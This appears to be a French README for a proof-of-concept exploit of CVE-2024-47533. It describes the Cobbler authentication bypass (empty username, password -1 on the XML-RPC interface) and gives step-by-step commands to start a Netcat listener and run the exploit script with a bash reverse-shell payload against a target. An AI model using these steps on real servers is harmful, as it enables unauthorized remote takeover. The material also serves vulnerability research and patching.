
CVE-2024-47533 est une vulnérabilité critique de contournement de l'authentification dans Cobbler (versions 3.0.0 à avant 3.2.3 et 3.3.7) permettant l'exécution de code à distance sans authentification via l'interface XMLRPC.
⚠️ Exécution de code à distance critique via contournement d'authentification dans Cobbler
🛠️ Implémentation du PoC par @dollarboysushil
Cobbler, un serveur d'installation Linux qui permet de configurer rapidement des environnements d'installation réseau, présente une vulnérabilité d'authentification dans les versions allant de 3.0.0 jusqu'à (mais sans inclure) 3.2.3 et 3.3.7. La fonction utils.get_shared_secret() renvoie toujours -1, ce qui permet à n'importe qui de se connecter à l'interface XML-RPC de Cobbler avec un nom d'utilisateur vide ('') et un mot de passe -1. Cela permet à un attaquant disposant d'un accès réseau de prendre le contrôle total du serveur Cobbler. La vulnérabilité est corrigée dans les versions 3.2.3 et 3.3.7.
La vulnérabilité est causée par une gestion inappropriée du secret partagé dans la fonction utils.get_shared_secret(), qui renvoie toujours -1, contournant ainsi l'authentification. Cela permet à tout utilisateur réseau de se connecter à l'interface XMLRPC de Cobbler avec des identifiants vides et d'exécuter des commandes arbitraires.
http://<target>:25151/ — Point de terminaison API XMLRPC de Cobbler
Le script d'exploitation prend en charge diverses charges utiles de shell inverse, notamment :
nc, nc2)Démarrez un auditeur Netcat sur votre machine :
nc -lvnp 4444

Exécutez le script d'exploitation CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

En cas d'exécution réussie, le shell inverse se reconnectera à l'auditeur, accordant à l'attaquant un accès distant au serveur.
